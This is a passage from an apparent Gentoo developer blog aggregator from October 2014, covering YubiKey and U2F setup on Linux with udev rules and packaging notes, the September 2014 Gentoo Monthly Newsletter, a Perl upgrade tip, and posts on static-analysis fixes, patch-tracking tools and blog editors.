U2F helps with this, as it lets the browser handshake with the service before providing the current token to authenticate the access. Sure, there might still be gaps in its implementation, and since I have not studied it in depth I'm not going to vouch for it being untouchable, but I trust the people who worked on it and I feel safer with it than I would be with a simple OTP.

October 26, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

I have already posted a howto on how to set up the YubiKey NEO and YubiKey NEO-n for U2F, and I promised I would write a bit more on the adventure to get the software packaged in Gentoo.

You have to realize at first that my relationship with Yubico has not always been straightforward. I have at least once decided against working on the Yubico set of libraries in Gentoo because I could not get hold of a device as I wanted to use it. But luckily now I was able to place an order with them (for some two thousand euro) and I have my devices.

But Yubico's code is usually quite well written, and designed to be packaged much more easily than most other device-specific middleware, so I cannot complain too much. Indeed, they split and release separately different libraries with different goals, so that you don't need to wait for enough magnitude to be pulled for them to make a new release. They also actively maintain their code in GitHub, and then push proper make dist releases on their website. They are in many ways a packager's dream company.

But let's get back to the devices themselves. The NEO and NEO-n come with three different interfaces: OTP (old-style YubiKey, just much longer keys), CCID (Smartcard interface) and U2F. By default the devices are configured as OTP only, which I find a bit strange to be honest. It is also the case that at the moment you cannot enable both U2F and OTP modes, I assume because there is a conflict on how the "touch" interaction behaves, indeed there is a touch-based interaction on the CCID mode that gets entirely disabled once enabling either of U2F or OTP, but the two can't share.

What is not obvious from the website is that to enable U2F (or CCID) modes, you need to use yubikey-neo-manager, an open-source app that can reconfigure the basics of the Yubico device. So I had to package the app for Gentoo of course, together with its dependencies, which turned out to be two libraries (okay actually three, but the third one sys-auth/ykpers was already packaged in Gentoo — and actually originally committed by me with Brant proxy-maintaining it, the world is small, sometimes). It was not too bad but there were a few things that might be worth noting down.

First of all, I had to deal with dev-libs/hidapi that allows programmatic access to raw HID USB devices: the ebuild failed for me, both because it was not depending on udev, and because it was unable to find the libusb headers — turned out to be caused by bashisms in the configure.ac file, which became obvious as I moved to dash. I have now fixed the ebuild and sent a pull request upstream.

This was the only really hard part at first, since the rest of the ebuilds, for app-crypt/libykneomgr and app-crypt/yubikey-neo-manager, were mostly straightforward — only I had to figure out how to install a Python package, as I had never done so before. It's actually fun how distutils will error out with a violation of install paths if easy_install tries to bring in a non-installed package such as nose, way before the Portage sandbox triggers.

The problems started when trying to use the programs, doubly so because I don't keep a copy of the Gentoo tree on the laptop, so I wrote the ebuilds on the headless server and then tried to run them on the actual hardware. First of all, you need to have access to the devices to be able to set them up; the libu2f-host package will install udev rules to allow the plugdev group access to the hidraw devices — but it also needed a pull request to fix them. I also added an alternative version of the rules for systemd users that does not rely on the group but rather uses the ACL support (I was surprised, I essentially suggested the same approach to replace pam_console years ago!)

Unfortunately that only works once the device is already set in U2F mode, which does not work when you're setting up the NEO for the first time, so I originally set it up using kdesu. I have since decided that the better way is to use the udev rules I posted in my howto post.

After this, I switched off OTP and enabled the U2F and CCID interfaces on the device — but I couldn't make it stick: the manager kept telling me that the CCID interface was disabled, even though the USB descriptor properly called it "Yubikey NEO U2F+CCID". It took me a while to figure out that the problem was in the app-crypt/ccid driver, and indeed the changelog for the latest version points out support for specifically the U2F+CCID device.

I have updated the ebuilds afterwards, not only to depend on the right version of the CCID driver – the README for libykneomgr does tell you to install pcsc-lite, but not which CCID driver you need – but also to check for the HIDRAW kernel driver, as otherwise you won't be able to configure or use the U2F device for non-Google domains.
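
In ebuild terms, the kernel check is the kind of thing the linux-info eclass takes care of; a rough sketch of the relevant bits (the exact version bound on ccid is illustrative) would be:

# hypothetical excerpt from the yubikey-neo-manager ebuild
inherit linux-info

# warn if CONFIG_HIDRAW is not enabled in the running kernel
CONFIG_CHECK="~HIDRAW"
RDEPEND="app-crypt/libykneomgr
	>=app-crypt/ccid-1.4.18"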

Now there is one more part of the story that needs to be told, but in a different post: getting GnuPG to work with the OpenPGP applet on the NEO-n. It was not as straightforward as it could have been, and it did lead to disappointment. It'll be a good post for next week.

October 25, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

When the Google Online Security blog announced earlier this week the general availability of Security Key, everybody at the office was thrilled, as we've been waiting for the day for a while. I've been using this for a while already, and my hope is for it to be easy enough for my mother and my sister, as well as my friends, to start using it.

While the promise is for a hassle-free second factor authenticator, it turns out it might not be as simple as originally intended, at least on Linux, at least right now.

Let's start with the hardware, as there are four different options of hardware that you can choose from:

  • Yubico FIDO U2F which is a simple option only supporting the U2F protocol, no configuration needed;
  • Plug-up FIDO U2F which is a cheaper alternative with the same features — I have not been able to check whether it is as sturdy as the Yubico one, so I can't vouch for it;
  • Yubikey NEO which provides multiple interfaces, including OTP (not usable together with U2F), OpenPGP and NFC;
  • Yubikey NEO-n the same as above, but without NFC, and in a very tiny form factor designed to be left semi-permanently in a computer or laptop.

I got the NEO, but mostly to be used with LastPass – the NFC support allows you to have 2FA on the phone without having to type it back from a computer – and a NEO-n to leave installed on one of my computers. I already had a NEO from work to use as well. The NEO requires configuration, so I'll get back to it in a moment.

The U2F devices are accessible via hidraw, a driverless access protocol for USB devices, originally intended for devices such as keyboards and mice but also leveraged by UPSes. What happens, though, is that you need access to the device, which the Linux kernel by default makes accessible only to root, for good reasons.

To make the device accessible to you, the user actually at the keyboard of the computer, you have to use udev rules, and those are, as always, not straightforward. My personal hacky choice is to make all the Yubico devices accessible — the main reason being that I don't know all of the compatible USB Product IDs, as some of them are not really available to buy but come, for instance, from developer-mode devices that I may or may not end up using.

If you're using systemd with device ACLs (in Gentoo, that would be sys-apps/systemd with acl USE flag enabled), you can do it with a file as follows:

# /etc/udev/rules.d/90-u2f-securitykey.rules
ATTRS{idVendor}=="1050", TAG+="uaccess"
ATTRS{idVendor}=="2581", ATTRS{idProduct}=="f1d0", TAG+="uaccess"

If you're not using systemd or ACLs, you can use the plugdev group and instead do it this way:

# /etc/udev/rules.d/90-u2f-securitykey.rules
ATTRS{idVendor}=="1050", GROUP="plugdev", MODE="0660"
ATTRS{idVendor}=="2581", ATTRS{idProduct}=="f1d0", GROUP="plugdev", MODE="0660"

(These rules originally did not include the Plug-up device, because I had no idea what its VID/PID pair was.) Edit: added the rules for the Plug-up device. Cute, their use of f1d0 as the device ID.
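
Whichever variant you pick, remember that udev won't apply the new rules to a device that is already plugged in; reloading the rules and re-triggering as root (or simply replugging the key) does the trick:

udevadm control --reload-rules
udevadm trigger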

Also note that there are probably less hacky solutions to get the ownership of the devices right, but I'll leave it to the systemd devs to figure out how to include them in the default ruleset.

These rules will not only allow your user to access /dev/hidraw0 but also the /dev/bus/usb/* devices. This is intentional: Chrome (and Chromium, the open-source version, works as well) uses the U2F devices in two different modes. One is through a built-in extension that works with Google assets and accesses the low-level device as /dev/bus/usb/*; the other is through a Chrome extension which uses /dev/hidraw* and is meant to be used by all websites. The latter is the actually standardized specification and how you're supposed to use it right now. I don't know if the former workflow is going to be deprecated at some point, but I wouldn't be surprised.

For those like me who bought the NEO devices, you'll have to enable the U2F mode — while Yubico provides a linked step-by-step guide, it was not really completely correct for me on Gentoo, but it should be less complicated now: I packaged the app-crypt/yubikey-neo-manager app, which already brings in all the necessary software, including the latest version of app-crypt/ccid required to use the CCID interface on U2F-enabled NEOs. And if you already created the udev rules file as I noted above, it'll work without you using root privileges. Just remember that if you are interested in the OpenPGP support you'll need the pcscd service (it should auto-start with both OpenRC and systemd anyway).
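
In practice the setup then boils down to a couple of commands; if pcscd doesn't auto-start for you, starting it by hand is trivial (OpenRC and systemd variants shown):

$ sudo emerge --ask app-crypt/yubikey-neo-manager
$ sudo rc-service pcscd start    # OpenRC
$ sudo systemctl start pcscd     # systemd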

I'll recount the issues with packaging the software separately. In the meantime make sure you keep your accounts safe, and let's all hope that more sites will start protecting your accounts with U2F — I'll also write a separate opinion piece on why U2F is important and why it is better than OTP; this is just meant as documentation on how to set up the U2F devices on your Linux systems.

Gentoo Monthly Newsletter: September 2014 (October 25, 2014, 09:10 UTC)

Gentoo News

Council News

The September council meeting was quite uneventful. The only outcome of note was that the dohtml function for ebuilds will be deprecated now and banned in a later EAPI, with some internal consequences for, e.g., einstalldocs.

Releases

New LiveDVD - Iron Penguin Edition thanks to the Gentoo Infrastructure team and Fernando Reyes. If you haven’t yet checked it out, what are you waiting for? Go get it on your closest mirror.

Gentoo Miniconf 2014

(shameless copy of Tomas Chvatal’s report on the gentoo-project mailing list)

Hello guys,

First I would like to say a big thank you to Amy (amynka) for prodding and nudging people and working on the booth. Next in line is Christopher (chithead), who also handled our booth and even brought with him a fancy MIPS machine and monitor all the way from Berlin. Kudos for that. And last I want to commend all the people giving the talks during the day. In the end we did a bit of Q&A with users, which was short, so I spent the rest asking how we should do the miniconf and what would be desired. So first let's take a look at what we had and what we can do to make it even cooler next time:

Booth

A place where we share/sell swag and chat with the community. People stopped by, took some stickers here and there and watched the MIPS boxie we had there. I have to admit that I screwed up with our materials a bit and we didn't have much on the stand. I thought we had more leftover stickers/brochures, but we had just a few, and my super plan to get Gentoo t-shirts failed me miserably…

Future possibilities

Someone from Gentoo e.V. could come too and actually sell some stuff like cups/t-shirts, as we seem unable to get something similar working here in the Czech Republic. With that we would have a really pretty booth. People were quite interested in our merchandise and are even willing to buy it.

Track

We had one day of talks, and basically everything went smoothly; videos will be available on YouTube in the near future. I will try to remember to post the link here as a reply when it is done (if it is not here in a week, prod me on IRC, because that means I forgot).

Future possibilities

We should make the thing two days, so it is worth it for people to come to Prague; for one day I guess it is not that motivating. We should also start looking for talks sooner than a couple of months in advance, so people can plan for it.

Overall state/possibilities

First here are photos:
http://www.root.cz/galerie/linuxdays-2014-sobota/
http://www.root.cz/galerie/linuxdays-2014-nedele/

The LinuxDays people are more than happy to provide us with the room if we have the content. Most of the people attending the conference speak English, so even though large parts of the tracks are in Czech, we can talk with the people around. We could do it yearly/bi-yearly; my take would be to hold a two-day miniconf every two years, so the next one could be in 2016, unless of course you want it next year again, in which case tell me right now.

Gentoo Developer Moves

Summary

Gentoo is made up of 242 active developers, of which 43 are currently away.
Gentoo has recruited a total of 803 developers since its inception.

Changes

  • Chris Reffett joined the Wiki team
  • Alex Brandt joined the Python and OpenStack teams
  • Brian Evans joined the PHP team
  • Alec Warner left the ComRel and Infrastructure teams
  • Michał Górny left the Portage team
  • Denis Dupeyron left the ComRel team
  • Robin H. Johnson left the ComRel team

Portage

This section summarizes the current state of the portage tree.

Architectures 45
Categories 162
Packages 17722
Ebuilds 37899
Architecture Stable Testing Total % of Packages
alpha 3661 582 4243 23.94%
amd64 10915 6318 17233 97.24%
amd64-fbsd 0 1573 1573 8.88%
arm 2701 1773 4474 25.25%
arm64 569 34 603 3.40%
hppa 3097 490 3587 20.24%
ia64 3213 627 3840 21.67%
m68k 612 98 710 4.01%
mips 0 2419 2419 13.65%
ppc 6866 2460 9326 52.62%
ppc64 4369 969 5338 30.12%
s390 1458 355 1813 10.23%
sh 1646 432 2078 11.73%
sparc 4156 916 5072 28.62%
sparc-fbsd 0 316 316 1.78%
x86 11564 5361 16925 95.50%
x86-fbsd 0 3238 3238 18.27%

gmn-portage-stats-2014-10

Security

The following GLSAs have been released by the Security Team

GLSA Package Description Bug
201409-10 app-shells/bash Bash: Code Injection (Updated fix for GLSA 201409-09) 523592
201409-09 app-shells/bash Bash: Code Injection 523592
201409-08 dev-libs/libxml2 libxml2: Denial of Service 509834
201409-07 net-proxy/c-icap c-icap: Denial of Service 455324
201409-06 www-client/chromium Chromium: Multiple vulnerabilities 522484
201409-05 www-plugins/adobe-flash Adobe Flash Player: Multiple vulnerabilities 522448
201409-04 dev-db/mysql MySQL: Multiple vulnerabilities 460748
201409-03 net-misc/dhcpcd dhcpcd: Denial of service 518596
201409-02 net-analyzer/net-snmp Net-SNMP: Denial of Service 431752
201409-01 net-analyzer/wireshark Wireshark: Multiple vulnerabilities 519014

Package Removals/Additions

Removals

Package Developer Date
dev-python/amara dev-zero 07 Sep 2014
dev-python/Bcryptor pacho 07 Sep 2014
dev-python/Yamlog pacho 07 Sep 2014
app-crypt/opencdk pacho 07 Sep 2014
net-dialup/gnome-ppp pacho 07 Sep 2014
media-plugins/vdr-dxr3 pacho 07 Sep 2014
media-video/dxr3config pacho 07 Sep 2014
media-video/em8300-libraries pacho 07 Sep 2014
media-video/em8300-modules pacho 07 Sep 2014
net-misc/xsupplicant pacho 07 Sep 2014
www-apache/mod_lisp2 pacho 07 Sep 2014
dev-python/py-gnupg pacho 07 Sep 2014
media-sound/decibel-audio-player pacho 07 Sep 2014
sys-power/gtk-cpuspeedy pacho 07 Sep 2014
app-emulation/emul-linux-x86-glibc-errno-compat pacho 07 Sep 2014
sys-fs/chironfs pacho 07 Sep 2014
net-p2p/giftui pacho 07 Sep 2014
app-misc/discomatic pacho 07 Sep 2014
x11-misc/uf-view pacho 07 Sep 2014
games-action/minetest_build hasufell 09 Sep 2014
games-action/minetest_common hasufell 09 Sep 2014
games-action/minetest_survival hasufell 09 Sep 2014
www-client/opera-next jer 15 Sep 2014
www-apps/swish-e dilfridge 19 Sep 2014
dev-qt/qcustomplot jlec 29 Sep 2014

Additions

Package Developer Date
dev-ruby/typhoeus graaff 01 Sep 2014
dev-python/toolz patrick 02 Sep 2014
dev-python/cytoolz patrick 02 Sep 2014
dev-python/unicodecsv patrick 02 Sep 2014
dev-python/characteristic idella4 02 Sep 2014
dev-python/service_identity idella4 02 Sep 2014
dev-libs/gom pacho 02 Sep 2014
games-roguelike/mazesofmonad hasufell 02 Sep 2014
dev-ruby/ast mrueg 04 Sep 2014
dev-ruby/cliver mrueg 04 Sep 2014
dev-ruby/parser mrueg 04 Sep 2014
dev-ruby/astrolabe mrueg 04 Sep 2014
net-ftp/pybootd vapier 04 Sep 2014
net-analyzer/nbwmon jer 04 Sep 2014
net-misc/megatools dlan 05 Sep 2014
dev-python/placefinder idella4 06 Sep 2014
dev-python/flask-cors idella4 09 Sep 2014
app-crypt/crackpkcs12 vapier 10 Sep 2014
dev-qt/linguist-tools pesa 11 Sep 2014
dev-qt/qdbus pesa 11 Sep 2014
dev-qt/qdoc pesa 11 Sep 2014
dev-qt/qtconcurrent pesa 11 Sep 2014
dev-qt/qtdiag pesa 11 Sep 2014
dev-qt/qtgraphicaleffects pesa 11 Sep 2014
dev-qt/qtimageformats pesa 11 Sep 2014
dev-qt/qtnetwork pesa 11 Sep 2014
dev-qt/qtpaths pesa 11 Sep 2014
dev-qt/qtprintsupport pesa 11 Sep 2014
dev-qt/qtquick1 pesa 11 Sep 2014
dev-qt/qtquickcontrols pesa 11 Sep 2014
dev-qt/qtserialport pesa 11 Sep 2014
dev-qt/qttranslations pesa 11 Sep 2014
dev-qt/qtwebsockets pesa 11 Sep 2014
dev-qt/qtwidgets pesa 11 Sep 2014
dev-qt/qtx11extras pesa 11 Sep 2014
dev-qt/qtxml pesa 11 Sep 2014
www-client/otter jer 13 Sep 2014
dev-util/pycharm-community xmw 14 Sep 2014
dev-util/pycharm-professional xmw 14 Sep 2014
media-libs/libgltf dilfridge 14 Sep 2014
www-client/opera-beta jer 15 Sep 2014
dev-libs/libbase58 blueness 15 Sep 2014
net-libs/courier-unicode hanno 16 Sep 2014
dev-libs/bareos-fastlzlib mschiff 16 Sep 2014
sys-libs/nss-usrfiles ryao 17 Sep 2014
sys-cluster/poolmon mschiff 18 Sep 2014
dev-python/pyClamd xmw 20 Sep 2014
sci-libs/htslib jlec 20 Sep 2014
dev-python/pika xarthisius 21 Sep 2014
games-rpg/wasteland2 hasufell 21 Sep 2014
app-backup/holland-lib-common alunduil 21 Sep 2014
app-backup/holland-backup-sqlite alunduil 21 Sep 2014
app-backup/holland-backup-pgdump alunduil 21 Sep 2014
app-backup/holland-backup-example alunduil 21 Sep 2014
app-backup/holland-backup-random alunduil 21 Sep 2014
app-backup/holland-lib-lvm alunduil 21 Sep 2014
app-backup/holland-lib-mysql alunduil 21 Sep 2014
app-backup/holland-backup-mysqldump alunduil 21 Sep 2014
app-backup/holland-backup-mysqlhotcopy alunduil 21 Sep 2014
app-backup/holland-backup-mysql-lvm alunduil 21 Sep 2014
app-backup/holland-backup-mysql-meta alunduil 21 Sep 2014
app-backup/holland alunduil 21 Sep 2014
net-libs/libndp pacho 22 Sep 2014
dev-python/keystonemiddleware prometheanfire 22 Sep 2014
media-libs/libbdplus beandog 22 Sep 2014
dev-python/texttable alunduil 23 Sep 2014
dev-perl/IMAP-BodyStructure chainsaw 25 Sep 2014
net-libs/uhttpmock pacho 25 Sep 2014
dev-perl/Data-Validate-IP chainsaw 25 Sep 2014
dev-perl/Data-Validate-Domain chainsaw 25 Sep 2014
dev-perl/Template-Plugin-Cycle chainsaw 25 Sep 2014
dev-perl/XML-Directory chainsaw 25 Sep 2014
dev-python/treq ryao 25 Sep 2014
dev-python/eliot ryao 25 Sep 2014
dev-python/xcffib idella4 26 Sep 2014
dev-qt/qtsensors pesa 26 Sep 2014
dev-python/path-py floppym 27 Sep 2014
dev-perl/Archive-Extract dilfridge 27 Sep 2014
dev-python/requests-mock alunduil 27 Sep 2014
dev-libs/appstream-glib eva 27 Sep 2014
dev-qt/qtpositioning pesa 28 Sep 2014
dev-qt/qcustomplot jlec 28 Sep 2014
dev-perl/Data-Structure-Util dilfridge 28 Sep 2014
dev-perl/IO-Event dilfridge 28 Sep 2014
dev-libs/qcustomplot jlec 29 Sep 2014
dev-python/webassets yngwin 30 Sep 2014
dev-python/google-apputils idella4 30 Sep 2014
dev-python/pyinsane voyageur 30 Sep 2014
dev-python/pyocr voyageur 30 Sep 2014
app-text/paperwork voyageur 30 Sep 2014

Bugzilla

The Gentoo community uses Bugzilla to record and track bugs, notifications, suggestions and other interactions with the development team.

Activity

The following tables and charts summarize the activity on Bugzilla between 01 September 2014 and 01 October 2014. Not fixed means bugs that were resolved as NEEDINFO, WONTFIX, CANTFIX, INVALID or UPSTREAM.
gmn-activity-2014-10

Bug Activity Number
New 1196
Closed 769
Not fixed 175
Duplicates 136
Total 6132
Blocker 5
Critical 17
Major 66

Closed bug ranking

The following table outlines the teams and developers with the most bugs resolved during this period

Rank Team/Developer Bug Count
1 Gentoo Security 49
2 Gentoo Linux Gnome Desktop Team 38
3 Python Gentoo Team 21
4 Qt Bug Alias 20
5 Perl Devs @ Gentoo 20
6 Gentoo KDE team 20
7 Portage team 19
8 Gentoo Games 17
9 Netmon Herd 16
10 Others 548

gmn-closed-2014-10

Assigned bug ranking

The developers and teams who have been assigned the most bugs during this period are as follows.

Rank Team/Developer Bug Count
1 Gentoo Linux bug wranglers 92
2 Gentoo Security 62
3 Gentoo Linux Gnome Desktop Team 59
4 Gentoo's Team for Core System packages 39
5 Gentoo Games 37
6 Portage team 33
7 Python Gentoo Team 32
8 Gentoo KDE team 32
9 Perl Devs @ Gentoo 27
10 Others 782

gmn-opened-2014-10

Tip of the month

(thanks to Thomas D. for the link to the blog post)

In case you like messing with your kernel Kconfig options to tweak the kernel image for your Gentoo boxes, you may want to know that menuconfig accepts regular expressions for searching symbols. You can start the search by typing ‘/’. For example, if you want to find all symbols ending with PCI do something like this after pressing ‘/’.

PCI$

You get a bunch of results, and then you can press the number listed on the left to jump directly to that symbol.

Related references:

http://michaelmk.blogspot.de/2014/08/jumping-directly-into-found-results-in.html

https://plus.google.com/101327154101389327284/posts/MyrhGjng1rQ

Heard in the community

Send us your favorite Gentoo script or tip at gmn@gentoo.org

Getting Involved?

Interested in helping out? The GMN relies on volunteers and members of the community for content every month. If you are interested in writing for the GMN or thinking of another way to contribute, please send an e-mail to gmn@gentoo.org.

Comments or Suggestions?

Please head over to this forum post.

October 19, 2014
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

Here's a small piece of advice for all who want to upgrade their Perl to the very newest available, but still keep running an otherwise stable Gentoo installation: These three lines are exactly what needs to go into /etc/portage/package.keywords:
dev-lang/perl
virtual/perl-*
perl-core/*
Of course, as always, bugs may be present; what you get as a Perl installation is called unstable or testing for a reason. We're looking forward to your reports on our Bugzilla.
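
After adding those lines, the upgrade itself is the usual update plus a run of perl-cleaner to rebuild modules against the new Perl; a typical invocation (the exact flags are a matter of taste) would be:

$ sudo emerge --ask --update --deep --newuse dev-lang/perl
$ sudo perl-cleaner --all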

Sven Vermeulen a.k.a. swift (homepage, bugs)
Lots of new challenges ahead (October 19, 2014, 14:01 UTC)

I’ve been pretty busy lately, albeit behind the corners, which leads to a lower activity within the free software communities that I’m active in. Still, I’m not planning any exit, on the contrary. Lots of ideas are just waiting for some free time to engage. So what are the challenges that have been taking up my time?

One of them is that I recently moved. And with moving comes a lot of work in getting the place into good shape and getting settled. Today I finished the last job that I wanted to get done in my apartment in a short amount of time, so that's one thing off my TODO list.

Another one is that I started an intensive master-after-master programme with the subject of Enterprise Architecture. This not only takes up quite some ex-cathedra time, but also additional hours of studying (and for the moment also exams). But I’m really satisfied that I can take up this course, as I’ve been wandering around in the world of enterprise architecture for some time now and want to grow even further in this field.

But that’s not all. One of my side activities has been blooming a lot, and I recently reached the 200th server that I’m administering (although I think this number will reduce to about 120 as I’m helping one organization with handing over management of their 80+ systems to their own IT staff). Together with some friends (who also have non-profit customers’ IT infrastructure management as their side-business) we’re now looking at consolidating our approach to system administration (and engineering).

I’m also looking at investing time and resources in a start-up, depending on the business plan and required efforts. But more information on this later when things are more clear :-)

October 18, 2014
Luca Barbato a.k.a. lu_zero (homepage, bugs)
Fix ALL the BUGS! (October 18, 2014, 12:12 UTC)

Vittorio started (with some help from me) to fix all the issues pointed out by Coverity.

Static analysis

Coverity (and scan-build) are quite useful to spot mistakes, even if their false-positive ratio tends to be quite high. Even the false positives are usually interesting, since they spot code that is unnecessarily convoluted. The code should be as simple as possible, but not simpler.

The basic idea behind those tools is to try to follow the code paths while compiling them and spot what could go wrong (e.g. you are feeding a NULL to a function that would dereference it).

The problems with this approach are usually two: false positives due to the limited scope of the analyzer, and false negatives due to shadowing.

False Positives

Coverity might assume certain invalid inputs can reach a function even if they are made impossible by some initial checks higher up in the code flow.

In those cases you should spend enough time to make sure Coverity is not right and that those faulty inputs aren't slipping in somewhere. NEVER just add some checks to the code it points at as a first move; you might end up hiding real issues (e.g. if Coverity complains about an uninitialized variable, do not just initialize it to something: check why it happens and whether the logic behind it is wrong).

If Coverity is confused, your compiler is confused as well and will produce suboptimal executables. Properly fixing those issues can result in useful speedups. Simpler code is usually faster.

Ever increasing issue count

While fixing issues using those tools you might notice to your surprise that every time you fix something, something new appears out of thin air.

This is not magic; it is simply that the static analyzers usually keep some limit on how deep they go, depending on the issues already present and how much time has been spent already.

That surprise has been fun, since apparently some of the time limit is per compilation unit, so splitting large files into smaller chunks gets us more results (while speeding up the build process thanks to better parallelism).

Usually fixing some high-impact issue gets us 3 to 5 new small-impact issues.

I like solving puzzles, so I do not mind having more fun; sadly I have not had much spare time to play this game lately.

Merge ALL the FIXES

Properly fixing all the issues is a lofty goal, and as usual having a patch is just half of the work. Usually two sets of eyes work better than one, and an additional brain with different expertise can prevent a good chunk of mistakes. The review process is the other, sometimes neglected, half of solving issues.

So far 100+ patches have piled up over the past weeks, and now they are being sent in small batches to ease the work of reviewing. (I have something brewing to make reviewing simpler, as you might know.)

During the review probably about 1/10 of the patches will be rejected, and the corresponding Coverity report updated with enough information to explain why it is a false positive or why the dangerous or strange behaviour pointed out is intentional.

The fixes will then land in the next point release of our 4 maintained major releases: 0.8, 9, 10 and 11. Many thanks to the volunteers that spend their free time keeping all the branches up to date!

Tracking patches (October 18, 2014, 11:53 UTC)

You need good tools to do a good job.

Even the best tool in the hand of a novice is a club.

I’m quite fond in improving the tools I use. And that’s why I started getting involved in Gentoo, Libav, VLC and plenty of other projects.

I already discussed lldb and asan/valgrind; now my current focus is on patch trackers, in part due to the current effort to improve the Libav one.

Contributors

Before talking about patches and their tracking, I'd like to digress a little on who produces them. The mythical Contributor: without contributions, an opensource project would not exist.

You might have recurring contributions and unique/seldom contributions. Both are quite important.
In general you should try to make it so that occasional contributors become recurring contributors.

A recurring contributor may accept spending some additional time setting up the environment needed to actually provide a contribution back to the community; a sporadic contributor can easily be put off if the effort required to send a patch is larger than writing the patch itself.

The project maintainers should make sure the life of contributors is as simple as possible.

Patches and Revision Control

Lately most opensource projects have seen the light and started to use decentralized source revision control systems, and thanks to GitHub and many others the concept of issuing pull requests is becoming part of our culture; with it comes, hopefully, a wider acceptance of the fact that the code should be reviewed before it is merged.

Pull Request

In a decentralized development scenario new code is usually developed in topic branches, routinely rebased against the master until the set is ready; then the set of changes (called a series or patchset) is reviewed and, after some rounds of fixes, eventually merged. Thanks to Bitbucket we now have forking, spooning and knifing as part of the jargon.

The review (and merge) step, quite properly, is called knifing (or stabbing): you have to dice, slice and polish the code before merging it.

Reviewing code

During a review bugs are usually spotted, and ways to improve the code are suggested as well. Patches might be split or merged together, and the series reworked and improved a lot.

The process is usually time consuming, even more so for an organization made of volunteers: writing code is fun, addressing the issues spotted is not so much, and reviewing someone else's code even less.

Sadly it is a necessary annoyance, since otherwise the errors (and horrors) that would slip through would be much bigger and probably much more numerous. If you do not care about code quality and what you are writing is not used by other people, you can probably ignore that; not so much if you feel somehow concerned that what you wrote might turn some people's life into a sea of pain. (On the other hand, some gratitude for such a daunting effort is usually welcome.)

Pull request management

The old-fashioned way to issue a pull request is either to poke somebody, telling them that your branch is ready for merge, or to just make a set of patches and mail them to whoever is in charge of integrating code into the main branch.

git provides a nifty tool to do that called git send-email, and it is quite common to send sets of patches (usually called series) to a mailing list. You get feedback by email, and you can send updated sets threaded under the original discussion using the --in-reply-to option and the message id.
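
As an illustration (the list address and message id below are just placeholders), a first submission and a follow-up revision of the same three patches would look like:

$ git send-email --to=some-project-devel@example.org -3
$ git send-email --to=some-project-devel@example.org \
      --in-reply-to='<message-id-of-the-first-series@example.org>' -3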

Platforms such as github and similar are more web centric and require you to use the web interface to issue and review the request. No additional tools are required beside your git and a browser.

Gerrit and ReviewBoard provide custom scripts to set up ephemeral branches in some staging area; the review process then requires a browser again. Every commit gets some tool-specific metadata to ease tracking changes across series revisions. This approach is the most setup-intensive.

Pro and cons

Mailing list approach

Testing patches from the mailing list is quite simple thanks to git am. And if the In-Reply-To field is used properly, updates appear sorted in a sensible way.
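
For instance, after saving a series from your mail client as an mbox file, applying it for testing is a one-liner (the path is just an example):

$ git am --3way /tmp/series.mbox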

This method is the simplest for people used to having their email client and a console always open (if they are using a well-configured emacs or vim, they literally never move away from the editor).

On the other hand, people using a webmail or using a basic email client might find the approach more cumbersome than a web based one.

If your only method to track contributions is a mailing list, it gets quite easy to lose track of the status of a set. Patches can be neglected, and even the people who wrote them might forget about them for a long time.

Patchwork approach

Patchwork tracks which patches hit a mailing list and tries to figure out automatically whether they eventually get merged.

It is quite basic: it provides a web interface to check the status and a means to update the patch status. The review must happen on the mailing list, and there is no concept of a series.

As basic as it is, it works as a reminder about pending patches, but it tends to get cluttered easily and keeping it clean requires some effort.

Github approach

The web interface makes it much easier to spot what is pending and what its status is; people used to having everything in the browser (Chrome and Mozilla can be made to work as a decent IDE lately) might like it much better.

Reviewing small series or single patches is usually nicer but the current UIs do not scale for larger (5+) patchsets.

People not living in a browser find it quite annoying to switch context, and it requires additional effort to contribute, since you have to register on a website and the process of issuing a patch requires many additional steps, while the email approach just requires typing git send-email -1.

Gerrit approach

The gerrit interfaces tend to be richer than the Github counterparts. That can be good or bad since they aren’t as immediate and tend to overwhelm new contributors.

You need to make an additional effort to setup your environment since you need some custom script.

The series are tracked with additional precision, but for all practical purposes the usage is the same as GitHub, with an additional burden on the contributor.

Introducing plaid

Plaid is my attempt to tackle the problem. It is currently unfinished and in dire need of more hands working on it.

It’s basic concept is to be non-intrusive as much as possible, retaining all the pros of the simple git+email workflow like patchwork does.

It already provides additional features such as the ability to manage series of patches and to track updates to them. It sports a view giving a breakdown of which series require a review and which have been pending for a long time waiting for an update.

What’s pending is adding the ability to review it directly in the browser, send the review email for the web to the mailing list and a some more.

I might complete it within the year or by next spring; if you like Flask or Python, contributions are warmly welcome!

October 17, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
My ideal editor (October 17, 2014, 19:03 UTC)

Notepad Art
Photo credit: Stephen Dann

Some of you probably read me ranting on G+ and Twitter about blog post editors. I have been complaining about that since at least last year when Typo decided to start eating my drafts. After that almost meltdown I decided to look for alternatives on writing blog posts, first with Evernote – until they decided to reset everybody's password and required you to type some content from one of your notes to be able to get the new one – and then with Google Docs.

I had indeed kept using Google Docs until recently, when it started having some issues with dead keys. I have been using the US International layout for years, and I'm too used to it even when I write English. If I use a keyboard layout without dead keys, I end up adding spaces where they shouldn't be. So even if the problem could be solved by just switching the layout, I wouldn't want to write a long text that way.

Then I decided to give another try to Evernote, especially as the Samsung Galaxy Note 10.1 I bought last year came with a yet-to-activate 12 months subscription to the Pro version. Not that I find anything extremely useful in it, but…

It all worked well for a while, until they decided to throw me into the new beta editor, which follows all the newest trends in blog editors. Yes, because there are trends in editors now! Away goes full-width editing; instead you have a limited-width editing space in a mostly-white canvas with a disappearing interface, like node.js's Ghost, Medium, and now Publify (the new name of what used to be Typo).

And here's my problem: while I understand that they try to make things that look neat and that supposedly are there to help you "focus on writing" they miss the point quite a bit with me. Indeed, rather than having a fancy editor, I think Typo needs a better drafting mechanism that does not puke on itself when you start playing with dates and other similar details.

And Evernote's new editor is not much better; indeed last week, while I was in Paris, I decided to take half an afternoon to write about libtool – mostly because J-B has been facing some issues and I wanted to document the root causes I encountered – and after two hours of heavy writing, I went back to Evernote and the note was gone. It had asked me to log back in, even though I had logged in that same morning.

When I complained about that on Twitter, the amount of snark and backward thinking I got surprised me. I was expecting some trolling, but I had people seriously suggesting me that you should not edit things online. What? In 2014? You've got to be kidding me.

